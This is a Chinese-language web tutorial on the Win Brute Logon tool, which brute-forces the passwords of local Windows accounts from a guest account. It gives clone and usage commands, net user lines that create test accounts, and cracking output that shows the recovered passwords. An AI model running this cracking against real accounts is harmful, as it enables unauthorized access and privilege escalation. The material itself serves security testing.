-关于win brute logon-
Win Brute Logon是一款强大的Windows用户账户安全测试工具,帮助研究人员测试任何Windows用户账户的安全性,包括来宾账户在内,无需特殊权限。
-工作原理-该工具利用微软Windows身份验证机制中的一个安全漏洞,该漏洞的关键在于缺乏执行此类操作所需的权限。因此,任何用户都可以通过最有限的来宾账户破解任何本地用户的密码。
最新版本的Win Brute Logon支持Stdin字典,并进行了少量代码优化。工具采用多线程机制,且支持32位和64位系统。
-工具下载-研究人员可以使用以下命令克隆该项目源码到本地:
git clone https://www.php.cn/link/e2b59155b6c9e8753f967f42ea5a4d3e.git
克隆完成后,可以在源码目录中找到对应Windows版本(32位或64位)的WinBruteLogon.exe程序。
-工具使用-字典文件
WinBruteLogon.exe -u <username> -w <wordlist_file>
Stdin字典
type <wordlist_file> | WinBruteLogon.exe -u <username> -
-工具运行-创建一个新的管理员用户
<pre class="brush:php;toolbar:false;">net user darkcodersc /add net user darkcodersc trousers net localgroup administrators darkcodersc /add
创建一个普通用户
<pre class="brush:php;toolbar:false;">net user HackMe /add net user HackMe ozlq6qwm
创建一个新的来宾账号
<pre class="brush:php;toolbar:false;">net user GuestUser /add net localgroup users GuestUser /delete net localgroup guests GuestUser /add
生成一个字典
https://www.php.cn/link/285fb42cb5e295f9249b7819417b3b77
-执行测试-首先,从管理员账户注销或重新启动计算机并登录到来宾账户。然后,将Win Brute Logon可执行程序复制到来宾账户可以访问的任何位置,并运行以下命令:
WinBruteLogon.exe -v -u <username> -w <wordlist_file>
测试第一个用户:darkcodersc(管理员)
WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
测试结果如下:
[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=2260, handle=364[INFO] New "TWorker" Thread created with id=3712, handle=532[DONE] Done.[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06
测试第二个用户:HackMe(普通用户)
WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
测试结果如下:
[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=5748, handle=336[INFO] New "TWorker" Thread created with id=4948, handle=140[DONE] Done.[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06
-工具运行测试PoC-测试目标:从Windows XP到最新版本的Windows 10(1909)
漏洞位置:LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW
项目地址
https://www.php.cn/link/e2b59155b6c9e8753f967f42ea5a4d3e
参考资料
https://www.php.cn/link/285fb42cb5e295f9249b7819417b3b77
以上就是如何使用Win Brute Logon测试Windows账号的安全性的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
761
收藏
